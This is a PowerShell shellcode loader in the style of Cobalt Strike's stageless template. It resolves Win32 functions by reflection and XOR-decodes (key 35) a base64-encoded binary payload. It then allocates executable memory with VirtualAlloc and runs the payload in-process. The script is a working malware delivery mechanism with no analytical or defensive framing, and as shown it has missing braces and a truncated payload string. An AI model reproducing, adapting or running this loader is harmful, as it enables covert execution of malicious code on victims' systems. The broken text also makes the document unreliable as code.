Set-StrictMode -Version 2
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
If ([IntPtr]::size -eq 8) {
[Byte[]]$var_code = [System.Convert]::FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4IdNIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjMyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOn/U3845wjr+OcI6/jnCOvhXLtr+KcI6/Ac/Gve5wjr3085K/inCOvElrsr8qcI68SWu2vapwjrxJa7q/pnCOv6uSwr+icI6/jnCKvNJwjr8Bz7a/VnCOvhXLur+KcI6+Fcumv4pwjr4Vy76/inCOvcUpAS+OcI68jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNzZiMjR6UmI04mzUAjIyMjIyMjI9MjAYMoISgjI8EhIyNtISMjIyMj39oiIyMzIyMjIyOjIiMjIyMzIyMjISMjJiMhIyMjIyMmIyEjIyMjIyNDJiMjJyMjIyMjIyEjQyIjIzMjIyMjIyMzIyMjIyMjIyMzIyMjIyMjMyMjIyMjIyMjIyMzIyMjw9kgI3EjIyNjxSAjRyMjIyMjIyMjIyMjIwMmI8MBIyMjIyMjIyMjIyNzJiMjJSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj6CAjUyMjIyMjIyMjIyMjIyMgI1MlIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNV0ZbVyMjI/HDISMjMyMjI8EhIyMnIyMjIyMjIyMjIyMjIyMDIyNDDVFHQldCIyMR2CMjIyMgIyPfIyMjxSEjIyMjIyMjIyMjIyMjYyMjYw1HQldCIyMjaz8iIyMjJyMjTSMjI8EgIyMjIyMjIyMjIyMjI2MjI+MNU0dCV0IjI8MBIyMjAyYjIwcjIyNzJyMjIyMjIyMjIyMjIyNjIyNjDVFGT0xAIyObLCMjI3MmIyMzIyMjVycjIyMjIyMj
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)